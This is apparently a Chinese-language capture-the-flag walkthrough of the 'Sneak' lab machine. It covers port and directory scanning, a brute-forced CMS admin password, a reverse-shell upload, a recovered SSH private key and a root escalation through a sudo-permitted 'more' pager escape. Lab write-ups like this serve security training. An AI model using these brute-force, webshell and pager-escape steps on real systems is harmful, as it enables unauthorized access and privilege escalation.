Sneak

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 19:04 CST
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:4E:1A:DF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.57
Host is up (0.00085s latency).
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds

靶机IP：192.168.2.57

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap --min-rate 10000 -p- 192.168.2.57                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 19:05 CST
Nmap scan report for 192.168.2.57
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 44.82 seconds

开放端口：22,80

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 19:06 CST
Nmap scan report for 192.168.2.57
Host is up (0.00092s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap -sU --top-ports 100 192.168.2.57 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 21:30 CST
Nmap scan report for 192.168.2.57
Host is up (0.0011s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 104.56 seconds

没有开放的端口

三、WEB渗透

访问80端口，只有一个页面，没啥东西

1、目录扫描

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# gobuster dir -u http://192.168.2.57/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 6]
/.html                (Status: 403) [Size: 277]
/cms                  (Status: 301) [Size: 310] [--> http://192.168.2.57/cms/]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

找到一个cms，尝试访问，报500错误

尝试加上cms后再进行目录扫描

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# dirsearch -u "http://192.168.2.57/cms"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /miao/maze-sec/sneak/reports/http_192.168.2.57/_cms_25-07-14_21-33-40.txt

Target: http://192.168.2.57/

[21:33:40] Starting: cms/
[21:33:42] 200 -  413B  - /cms/.gitignore
[21:33:42] 403 -  277B  - /cms/.ht_wsr.txt
[21:33:42] 403 -  277B  - /cms/.htaccess.bak1
[21:33:42] 403 -  277B  - /cms/.htaccess.sample
[21:33:42] 403 -  277B  - /cms/.htaccess.orig
[21:33:42] 403 -  277B  - /cms/.htaccess.save
[21:33:42] 403 -  277B  - /cms/.htaccess_extra
[21:33:42] 403 -  277B  - /cms/.htaccess_orig
[21:33:42] 403 -  277B  - /cms/.htaccess_sc
[21:33:42] 403 -  277B  - /cms/.htaccessBAK
[21:33:42] 403 -  277B  - /cms/.htaccessOLD
[21:33:42] 403 -  277B  - /cms/.htaccessOLD2
[21:33:42] 403 -  277B  - /cms/.htm
[21:33:42] 403 -  277B  - /cms/.html
[21:33:42] 403 -  277B  - /cms/.htpasswd_test
[21:33:42] 403 -  277B  - /cms/.htpasswds
[21:33:42] 403 -  277B  - /cms/.httr-oauth
[21:33:44] 403 -  277B  - /cms/.php
[21:34:05] 200 -    0B  - /cms/config.php
[21:34:06] 301 -  318B  - /cms/content  ->  http://192.168.2.57/cms/content/
[21:34:06] 200 -    0B  - /cms/content/
[21:34:07] 301 -  315B  - /cms/core  ->  http://192.168.2.57/cms/core/
[21:34:17] 301 -  318B  - /cms/install  ->  http://192.168.2.57/cms/install/
[21:34:17] 200 -  543B  - /cms/install/
[21:34:17] 200 -  543B  - /cms/install/index.php?upgrade/
[21:34:19] 301 -  314B  - /cms/lib  ->  http://192.168.2.57/cms/lib/
[21:34:19] 200 -    0B  - /cms/lib/
[21:34:20] 200 -    2KB - /cms/license.txt
[21:34:25] 301 -  318B  - /cms/modules  ->  http://192.168.2.57/cms/modules/
[21:34:25] 200 -    0B  - /cms/modules/
[21:34:36] 200 -    1KB - /cms/README.md
[21:34:37] 200 -   90B  - /cms/robots.txt
[21:34:44] 301 -  317B  - /cms/styles  ->  http://192.168.2.57/cms/styles/

Task Completed

在/cms/acp找到一个登录框

2、密码爆破

尝试对登录密码进行爆破，找到账号和密码admin:88888888

3、文件上传

进入后修改允许上传的文件类型

上传反弹shell脚本，上传后的文件路径http://192.168.2.57/cms/content/files/rev.php

4、获取www-data权限

www-data@Sneak:/var/www/html/cms/content/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、获取USER权限

查看/etc/passwd，发现user用户的密码为user@123

www-data@Sneak:/home/user$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
user:x:1001:1001:user@123:/home/user:/bin/bash
sysadm:x:1002:1003:Where is my license?:/home/sysadm:/bin/bash

获取user权限

www-data@Sneak:/home/user$ su user
Password: 
user@Sneak:~$ id
uid=1001(user) gid=1001(user) groups=1001(user)

USER FLAG

user@Sneak:~$ cat user.txt 
flag{user-9fcae37cb857fb5fc6f8d74c82a5d0ga}

五、权限提升

1、获取sysadm权限

在/etc/passwd里面提示sysadm:x:1002:1003:Where is my license?:/home/sysadm:/bin/bash
同时在/cms/license.txt找到私钥

┌──(root㉿kali)-[/miao/Maze-sec/sneak]
└─# curl http://192.168.2.57/cms/license.txt
-----YEK ETAVIRP HSSNEPO NIGEB-----
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
==wBGUABDIQArFWZuNFQtRWYzl3cMAAAAkn2WUqipD5tU8
-----END OPENSSH PRIVATE KEY-----

该私钥格式存在问题，经过对比，发现是单行数需要进行反转

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# awk 'NR%2==1{for(i=length;i>0;i--)printf "%s", substr($0,i,1); print ""}
NR%2==0{print}' license.txt > sysadm.key

得到正确的私钥

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# cat sysadm.key         
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

得到权限

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# ssh sysadm@192.168.2.57 -i sysadm.key 
Warning: Permanently added '192.168.2.57' (ED25519) to the list of known hosts.
Linux Sneak 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sysadm@Sneak:~$ id
uid=1002(sysadm) gid=1003(sysadm) groups=1003(sysadm)

2、more提权

使用sudo -l，发现可以more查看这个文件

sysadm@Sneak:~$ sudo -l
Matching Defaults entries for sysadm on Sneak:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sysadm may run the following commands on Sneak:
    (ALL) NOPASSWD: /usr/bin/more /var/log/custom/fake-cleanup.sh

但是文件长度不够导致无法分页进入shell

sysadm@Sneak:~$ /usr/bin/more /var/log/custom/fake-cleanup.sh
# System cleanup script - DO NOT MODIFY
#

方法一：管道阻塞

可以通过管道阻塞的方式进行提权，输入!bash即可

sysadm@Sneak:~$ echo miao | sudo /usr/bin/more /var/log/custom/fake-cleanup.sh
miao
!bash
root@Sneak:/home/sysadm# id
uid=0(root) gid=0(root) groups=0(root)

方法二：修改stty

• 修改终端的stty rows 2

  sysadm@Sneak:~$ stty rows 2
  sysadm@Sneak:~$ sudo /usr/bin/more /var/log/custom/fake-cleanup.sh
  # System cleanup script - DO NOT MODIFY
  !bash
  root@Sneak:/home/sysadm# id
  uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Sneak:~# cat root.txt 
flag{root-36bee2f8db4943b0f6c9d16afe11d454}

【总结】

1、ssh私钥

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcnN
...（中间省略）...
-----END OPENSSH PRIVATE KEY-----

2、more提权

more的特性：

• 在分页暂停时，more可以执行多种命令，其中以!开头的命令会在shell中执行。
• 例如，输入!/bin/bash会启动一个交互式shell。

当输出文件的行数不满足分页时，可以通过下述方式实现分页暂停

• 管道阻塞，echo xxxx | sudo more
• 修改stty